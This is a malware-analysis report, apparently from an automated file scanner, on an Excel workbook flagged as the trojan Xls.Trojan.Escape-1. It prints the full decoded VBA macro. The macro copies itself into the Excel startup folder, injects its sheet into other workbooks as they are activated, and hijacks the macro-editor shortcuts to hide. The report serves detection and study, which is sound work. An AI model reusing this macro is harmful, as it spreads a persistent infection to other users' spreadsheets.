MALICIOUS
88
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
This Excel document contains VBA macros, including an Auto_Open macro, which is a common technique for executing malicious code upon opening. The script attempts to copy itself to the Excel startup directory as 'StartUp.xls' to achieve persistence. The ClamAV heuristic also flags this as a Trojan.
Heuristics 2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub auto_open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3462 bytes |
SHA-256: 9b5ae10b55001f553e4420cd10f6ae883c0985f617df4f90f751a067836e645c |
|||
|
Detection
ClamAV:
Xls.Trojan.Escape-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "StartUp"
Sub auto_open()
Dim i As Single
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
'Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!ycop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.Calculation = xlCalculationManual
' On Error Resume Next
' On Error GoTo 0
Worksheets("barcode").ComboBox2.Clear
Worksheets("barcode").ComboBox2.AddItem "MDM20"
Worksheets("barcode").ComboBox2.AddItem "MDQ70"
Worksheets("barcode").ComboBox2.AddItem "MDM21"
Worksheets("barcode").ComboBox2.AddItem "MDM20Z"
Worksheets("barcode").ComboBox2.AddItem "MDT10"
Worksheets("barcode").ComboBox2.AddItem "MDS90"
Worksheets("barcode").ComboBox1.Clear
Worksheets("barcode").ComboBox1.AddItem "ÐÂLOT"
' Worksheets("barcode").ComboBox3.Clear
' For i = 2 To Worksheets("sequence").[a65536].End(xlUp).Row
' Worksheets("barcode").ComboBox3.AddItem Worksheets("sequence").Cells(i, 1)
' Next i
Dim MyArray(280, 3)
'µÚÒ»¸öÁбí¿ò°üº¬Èý¸öÊý¾ÝÁÐ
Worksheets("barcode").ListBox1.ColumnCount = 3
'µÚ¶þ¸ö¿ò°üº¬Áù¸öÊý¾ÝÁÐ
For i = 0 To 280
MyArray(i, 0) = Worksheets("È«¹¤³Ì£¨ZPT£©").Cells(i + 4, 8)
MyArray(i, 1) = Worksheets("È«¹¤³Ì£¨ZPT£©").Cells(i + 4, 6)
MyArray(i, 2) = Worksheets("È«¹¤³Ì£¨ZPT£©").Cells(i + 4, 7)
Next i
' MyArray = Worksheets("È«¹¤³Ì£¨ZPT£©").Range("F4:H" & Worksheets("È«¹¤³Ì£¨ZPT£©").[a65536].End(xlUp).Row)
' MyArray = Worksheets("È«¹¤³Ì£¨ZPT£©").Range("f4:h9")
Worksheets("barcode").ListBox1.List() = MyArray
' ListBox2.Column() = MyArray
Rem arr = Worksheets("È«¹¤³Ì£¨ZPT£©").Range("F4:H" & Worksheets("È«¹¤³Ì£¨ZPT£©").[a65536].End(xlUp).Row)
Rem ListBox1.AddItem Worksheets("È«¹¤³Ì£¨ZPT£©").Cells(i, 6)
End Sub
Sub ycop()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
n$ = ActiveSheet.Name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
Sheets(n$).Select
End If
End Sub
Sub escape()
On Error Resume Next
Application.OnSheetActivate = "StartUp.xls!back"
Application.OnKey "%{F11}"
Application.OnKey "%{F8}"
Application.SendKeys "%{F11}"
Application.SendKeys "%{F8}"
For Each book In Workbooks
Application.DisplayAlerts = False
If book <> "StartUp.xls" Then book.Sheets("StartUp").Delete
Next
For Each book In Workbooks
If book.Name = "StartUp.xls" Then
book.Close
End If
Next
End Sub
Sub back()
On Error Resume Next
Application.OnKey "%{F8}", "StartUp.xls!escape"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnSheetActivate = "StartUp.xls!ycop"
Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!ycop"
Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.